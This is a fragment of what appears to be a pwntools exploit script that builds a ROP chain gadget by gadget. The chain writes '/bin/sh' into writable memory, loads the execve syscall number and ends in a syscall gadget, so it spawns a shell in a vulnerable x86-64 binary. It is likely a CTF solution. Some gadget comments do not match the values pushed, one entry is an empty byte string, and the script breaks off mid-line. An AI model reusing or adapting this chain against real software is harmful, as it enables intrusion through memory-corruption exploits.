payload = p64(0x40f208)
#0x000000000040f208: pop rcx; ret; 
payload += p64(0x401ef5)+p64(0x403233)
# 0x0000000000403233: pop r14; pop rbp; ret; 
payload += p64(0x421181)+p64(0x0)+p64(0x411aa2)
# 0x0000000000411aa2: mov qword ptr [r14], rcx; add rsp, 8; pop rbx; pop r14; pop r15; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40f208)
# 0x000000000040f208: pop rcx; ret; 
payload += p64(0x68662f6e69622f)+p64(0x403233)
# 0x0000000000403233: pop r14; pop rbp; ret; 
payload += p64(0x421070)+p64(0x0)+p64(0x411aa2)
# 0x0000000000411aa2: mov qword ptr [r14], rcx; add rsp, 8; pop rbx; pop r14; pop r15; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x403234)
# 0x0000000000403234: pop rsi; pop rbp; ret; 
payload += p64(0x421181)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x421201)+p64(0x413f54)
# 0x0000000000413f54: lea eax, [rdi - 1]; ret; 
payload += p64(0x41c0d9)
# 0x000000000041c0d9: add byte ptr [rax], al; pop rax; sub edi, ebp; jmp qword ptr [rsi]; 
payload += p64(0x0)
# 0x0000000000401ef5: pop rbx; pop rbp; ret; 
payload += p64(0x4017d3)+p64(0x0)+p64(0x40f208)
# 0x000000000040f208: pop rcx; ret; 
payload += p64(0x0)+p64(0x401c74)
# 0x0000000000401c74: cdq; add rbx, rcx; jmp rbx; 
payload += b''
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x3c)+p64(0x413f54)
# 0x0000000000413f54: lea eax, [rdi - 1]; ret; 
payload += p64(0x403234)
# 0x0000000000403234: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x421070)+p64(0x402fab)
# 0x0000000000402fab: syscall; ret; 
payload +=
